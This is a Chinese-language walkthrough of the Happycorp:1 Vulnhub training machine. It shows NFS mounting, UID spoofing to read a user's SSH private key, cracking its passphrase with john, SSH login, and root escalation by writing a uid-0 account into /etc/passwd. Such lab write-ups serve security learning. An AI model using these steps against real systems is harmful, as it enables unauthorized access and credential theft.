Happycorp:1 Vulnhub Walkthrough

靶機連接：

https://www.vulnhub.com/entry/happycorp-1,296/

網絡主機掃描：：：

 

主機端口掃描：

 

NFS文件系統，嘗試掛載試試

mount -t nfs 10.10.202.135:/home/karl /mnt

 

提示沒權限打開。這裏暫時放一放，看看HTTP方面，有個admin.php後臺能不能上傳，拿shell

 

 

 

web頁面收集用戶信息：

heather 提示密碼錯誤
carolyn 帳戶不存在
rodney  帳戶不存在
jennifer 帳戶不存在

存在帳戶枚舉，這裏進行爆破top 500 weak password 沒成功，放棄

嘗試post username SQL注入，失敗

繼續看看NFS如何能讀取到.SSH文件夾下的內容

 

嘗試看下UID，咱們可否建立UID相同的用戶去讀取文件呢

╰─ groupadd --gid 1001 test

╰─ useradd --uid 1001 --group test pentest

 

獲取到了祕鑰，複製下來，保存成文件，嘗試使用用戶karl用戶登陸，結果。。。。

 

這祕鑰密碼是啥，先爆破試試，工具 ssh2john.py

https://github.com/koboi137/john

python ssh2john.py /root/key.txt > /root/sshkey_login

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt sshkey_login

 

成功登陸

 

接下來就是進行提權操做，不是標準的shell，這裏從新鏈接，指定shell

╰─ ssh -i key.txt karl@10.10.202.135 -t "/bin/sh"

find / -perm -u=s -type f 2>/dev/null

 

這裏的思路就是複製passwd文件，複製到NFS文件共享目錄，而後增長明文密碼權限，而後複製回去替換，切換用戶，獲取root權限

openssl passwd -1 -salt hack404 pass123

$1$hack404$auqhHGf8QPcNJkxkSEm1O0

hack404:$1$hack404$auqhHGf8QPcNJkxkSEm1O0:0:0:root:/root:/bin/bash

 

 

登陸成功去看下amdin.php文件的密碼究竟是什麼玩意

 

登陸試試

 

感受有包含漏洞

OVER !!!